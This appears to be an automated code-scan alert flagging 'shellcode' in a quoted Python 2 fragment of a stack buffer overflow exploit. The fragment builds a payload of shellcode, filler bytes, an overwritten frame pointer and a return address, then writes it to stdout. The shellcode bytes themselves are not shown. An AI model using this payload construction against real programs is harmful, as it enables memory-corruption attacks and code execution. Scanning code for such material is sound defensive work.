Potential leak of data: Shellcode


Detected 2 occurrence(s) of ‘shellcode’:
fset = int(sys.argv[1], 0)
frame_ptr_val += offset
return_addr_val += offset

frame_ptr = struct.pack('I', frame_ptr_val)
return_addr = struct.pack('I', return_addr_val)

#print frame_ptr.encode('hex')
#print return_addr.encode('hex')

exploit = SHELLCODE + fill * 0x3c + fill * 17 + frame_ptr + return_addr + ("\x00")
#exploit = ("\x01") * 50
sys.stdout.write(exploit)